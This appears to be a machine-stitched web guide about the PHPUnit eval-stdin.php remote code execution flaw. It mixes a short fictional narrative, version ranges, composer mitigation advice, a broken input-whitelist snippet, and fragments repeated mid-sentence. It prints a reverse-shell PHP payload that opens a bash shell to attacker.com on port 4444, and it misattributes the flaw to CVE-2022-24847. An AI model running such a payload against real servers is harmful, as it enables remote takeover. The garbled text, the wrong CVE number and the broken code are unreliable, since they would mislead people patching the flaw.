Guides

Vendor Phpunit Phpunit Src Util Php Eval-stdin.php Cve -

She thought of the CVE that would be written for it: short, clinical lines about remote code execution and severity scores. She could see the headlines already, the security teams’ red banners, the midnight patches and the mandatory postmortems. But before the bureaucracy, there was a chance to do the human thing: fix it quietly, teach the team, and prevent the chaos.

This means PHPUnit versions 4.x < 4.8.28 and 5.x < 5.6.3 are vulnerable, while versions 6.x and above are safe.

Long term (weeks–months)

Run composer install --no-dev to ensure development tools like PHPUnit are never deployed to production. vendor phpunit phpunit src util php eval-stdin.php cve

Alternatively, download the patched version of PHPUnit from the official GitHub repository:

With a raw POST body containing any PHP code.

// Instead, do this $input = trim(file_get_contents('php://stdin')); if (preg_match('/^[a-zA-Z0-9_]+$/', $input)) // For example, allow only whitelisted inputs switch ($input) case 'allowed_input_1': // Execute allowed action break; default: // Handle or log break; She thought of the CVE that would be

Date: March 23, 2026.

<?php exec('/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'); ?>

composer install --no-dev --optimize-autoloader This means PHPUnit versions 4

Many automated scanners, such as the PHPUnit Go Scanner, check dozens of possible paths where eval-stdin.php might be located. After confirming a vulnerable target, the attacker can execute system commands to compromise the server further.

Marta checked the commit logs. The eval-stdin.php file had been added with a message: “quick helper for debugging.” The author’s name was unfamiliar; a contractor perhaps, long since gone. The patch had slipped through because the CI pipeline was lax—no static analysis gates, no policy to forbid evals in deployed artifacts. She copied the file into a sandbox and drew a line through it with her editor.

The impact of CVE-2022-24847 cannot be overstated. As PHPUnit is a widely-used testing framework, many PHP applications are potentially vulnerable to this attack. The vulnerability can be exploited via a simple HTTP request, making it relatively easy for attackers to execute malicious code on the server.